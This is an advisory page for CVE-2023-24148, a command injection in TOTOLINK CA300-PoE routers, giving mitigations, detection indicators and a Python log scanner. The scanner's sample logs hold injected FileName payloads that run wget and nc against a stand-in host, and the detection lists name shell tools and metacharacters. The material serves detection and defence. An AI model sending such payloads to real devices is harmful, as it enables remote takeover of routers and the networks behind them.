CVE-2023-24148

9.8 CRITICAL

📋 TL;DR

This vulnerability allows unauthenticated remote attackers to execute arbitrary OS commands on TOTOLINK CA300-PoE routers by injecting shell commands into the FileName parameter handled by the setUploadUserData function of the web management interface. A successful attacker gains full control of the device and can use it against the network behind it. All users of TOTOLINK CA300-PoE V6.2c.884 are affected.

💻 Affected Systems

Products:
  • TOTOLINK CA300-PoE
Versions: V6.2c.884
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web management interface. No special configuration required for exploitation.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device takeover leading to network compromise, data exfiltration, lateral movement to other systems, and persistent backdoor installation.

🟠

Likely Case

Remote code execution allowing attackers to modify device configuration, intercept network traffic, or use the device as a foothold for further attacks.

🟢

If Mitigated

Limited impact if device is isolated from critical networks and has strict network access controls.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code is available in a GitHub repository. Exploitation requires only a single crafted HTTP request carrying the injected command in the FileName parameter; no authentication or user interaction is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: No

Instructions:

No official patch is known at the time of writing. Check the TOTOLINK support site for a CA300-PoE firmware release that references this issue; if one is published, download it only from the vendor and apply it through the web interface (a firmware update normally reboots the device, regardless of the "Restart Required" field above).

🔧 Temporary Workarounds

Network Isolation

Restrict access to the device management interface so that only a trusted administration host can reach it. The rules below are for the INPUT chain of a Linux host; they apply on the device itself only if the firmware gives you a shell, otherwise place equivalent rules on the upstream firewall (FORWARD chain, matching the device address as destination). Replace TRUSTED_IP, and repeat the pair for port 443 if the interface is also served over HTTPS. Order matters: the ACCEPT rule must precede the DROP rule.

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Rules added on the device itself are lost on reboot unless the firmware persists them, so verify them after every restart.

Disable Web Interface

Disable HTTP management if it is not required. This removes the vulnerable attack surface entirely, at the cost of losing the web UI; it is only possible where the firmware exposes a shell (telnet/SSH) and lets you stop the httpd service. Prefer SSH over telnet where both are available, since telnet sends credentials in cleartext.

🧯 If You Can't Patch

  • Segment affected devices in an isolated VLAN with strict firewall rules, allowing management access only from a trusted administration host
  • Restrict outbound connections from the device to the destinations it needs, so that an injected command cannot fetch a second-stage payload or open a reverse connection
  • Implement network monitoring for suspicious traffic to/from affected devices, in particular requests to the management interface and unexpected outbound connections

🔍 How to Verify

Check if Vulnerable:

Check device firmware version in web interface. If version is V6.2c.884, device is vulnerable.

Check Version:

Read the firmware version from the status or system page of the web interface. If the firmware exposes a version endpoint, `curl -s http://device-ip/version` may return it, but that path is not confirmed for this model; the web interface is authoritative.

Verify Fix Applied:

Confirm that the firmware version is later than V6.2c.884 and that the vendor's release notes or advisory state that the release addresses CVE-2023-24148. A higher version number alone does not prove the injection was fixed.

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests referencing the setUploadUserData function, especially from hosts that are not the administration host
  • Command names such as 'wget', 'curl', 'nc', 'bash' in request parameters (URL query or request body), most notably in the FileName parameter
  • Shell metacharacters (`;`, `|`, backtick, `$(`), plain or percent-encoded (%3B, %7C, %60, %24%28), in parameter values

Network Indicators:

  • HTTP requests to the management interface whose parameters contain shell metacharacters
  • Outbound connections from the device to unexpected destinations shortly after such a request (payload download or reverse shell)

SIEM Query:

http.url:*setUploadUserData* AND (http.url:*;* OR http.url:*|* OR http.url:*`* OR http.url:*$(*)

Adjust the field name to your schema and add the percent-encoded forms listed above. If the function name and FileName are carried in the request body rather than the URL, the query must also search the logged request body, otherwise it will miss every exploitation attempt.
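The indicators above turned into a small offline log scanner, as an added example that is not part of this advisory or of TOTOLINK's firmware. The log line format, the request paths (/cgi-bin/upload.cgi), the JSON key names, the client addresses and all sample lines are constructed for illustration; whether the setUploadUserData function name travels in the URL or in the request body depends on the firmware, so the scanner checks both and decodes parameter values twice to catch double-encoded metacharacters.

```python
import json
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

TARGET = "setUploadUserData"

# Indicators from the advisory's detection section: shell metacharacters and
# download/shell command names inside request parameter values.
META_RE = re.compile(r"[;|`]|\$\(|&&")
CMD_RE = re.compile(r"\b(wget|curl|nc|bash|telnetd)\b")

# Constructed log format (an assumption, not the device's own log layout):
#   <client-ip> [<timestamp>] "<METHOD> <uri> HTTP/1.x" <status> "<body or ->"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<body>.*)"$'
)


def extract_params(uri, body):
    """Gather parameter values from the query string and, when present, from a
    form-encoded or JSON body. Query values are decoded a second time so that a
    double-encoded metacharacter (%253B -> %3B -> ;) is still caught."""
    params = {}
    for key, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        params[key] = unquote_plus(value)
    if body and body != "-":
        text = body.strip()
        if text.startswith("{"):
            try:
                params.update({k: str(v) for k, v in json.loads(text).items()})
            except ValueError:
                pass  # malformed JSON: fall through with query parameters only
        else:
            for key, value in parse_qsl(text, keep_blank_values=True):
                params[key] = unquote_plus(value)
    return params


def classify(line):
    """Return (is_hit, reasons). A line is a hit only when it references
    setUploadUserData (in the path, query or body) and at least one parameter
    value carries a shell metacharacter or a command name."""
    match = LINE_RE.match(line)
    if not match:
        return False, ["unparsed"]
    uri, body = match.group("uri"), match.group("body")
    params = extract_params(uri, body)
    if TARGET not in unquote_plus(uri) and TARGET not in body:
        return False, []
    reasons = []
    for name, value in params.items():
        if META_RE.search(value):
            reasons.append(f"metachar in {name}")
        if CMD_RE.search(value):
            reasons.append(f"command name in {name}")
    return bool(reasons), reasons


def scan(lines):
    """Return [(line_number, reasons)] for every hit in an iterable of log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        is_hit, reasons = classify(line)
        if is_hit:
            hits.append((number, reasons))
    return hits


# Constructed sample lines (documentation addresses, hypothetical paths and keys).
SAMPLE_LOG = [
    # 1: legitimate-looking call, function name in a JSON body, plain filename
    '192.0.2.10 [10/Jan/2023:10:00:01 +0000] "POST /cgi-bin/upload.cgi HTTP/1.1" 200 '
    '"{"action":"setUploadUserData","FileName":"config.dat"}"',
    # 2: function name in the path, encoded ';' and a wget inside FileName
    '198.51.100.8 [10/Jan/2023:10:00:02 +0000] "POST /setUploadUserData?FileName=a.bin%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 "-"',
    # 3: JSON body with a pipe into nc inside FileName
    '198.51.100.9 [10/Jan/2023:10:00:03 +0000] "POST /cgi-bin/upload.cgi HTTP/1.1" 200 '
    '"{"action":"setUploadUserData","FileName":"x|nc 198.51.100.7 4444"}"',
    # 4: metacharacter in an unrelated request: not a hit for this CVE
    '192.0.2.11 [10/Jan/2023:10:00:04 +0000] "GET /login.cgi?user=admin;x HTTP/1.1" 401 "-"',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

Line 4 shows why the scanner requires the function name before it reports metacharacters: matching on metacharacters alone across the whole interface produces noise from password and search fields, while matching on the function name alone flags every legitimate upload. Both conditions together keep the rule specific to this CVE.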

🔗 References